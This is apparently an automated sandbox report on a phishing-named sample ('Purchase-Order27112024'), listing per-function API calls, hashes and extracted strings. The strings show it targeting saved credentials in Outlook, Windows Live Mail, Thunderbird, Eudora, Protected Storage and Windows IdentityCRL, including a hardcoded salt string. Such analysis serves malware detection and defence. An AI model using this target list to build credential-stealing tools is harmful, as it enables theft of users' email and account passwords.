                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3669619086-0
                                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1961120804-0
                                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 19.9%
Signature Coverage: 0.5%
Total number of Nodes: 866
Total number of Limit Nodes: 21

Control-flow Graph
control_flow_graph: function 4082cd-40841a (nodes 129-138; API calls in the graph: memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy; node/edge listing omitted)
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Control-flow Graph

APIs
• memset.MSVCRT ref: 00401E8B
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 1846531875-4223776976
• Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
• Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
• Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
• Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

Control-flow Graph

APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
• Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
• Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
• Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Control-flow Graph

APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
• PStoreCreateInstance, xrefs: 00403C44
• pstorec.dll, xrefs: 00403C30
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162
• Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
• Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
• Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
• Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Control-flow Graph
control_flow_graph: entry function 44b49f-44b4b0 (nodes 231-258; API calls in the graph: GetModuleHandleA * 2, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm * 2, __getmainargs, GetStartupInfoA, _cexit, exit; node/edge listing omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID: h4ND
• API String ID: 3662548030-3825183422
• Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
• Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
• Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
• Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                      • API String ID: 2768085393-1693574875

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                      Strings
                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                      • API String ID: 832325562-2578778931

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2012582556-3916222277

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                      • String ID: %s@yahoo.com
                                                                                                      • API String ID: 317221925-3288273942

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                      • API String ID: 3071782539-966475738

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                      • memset.MSVCRT ref: 0040CD96
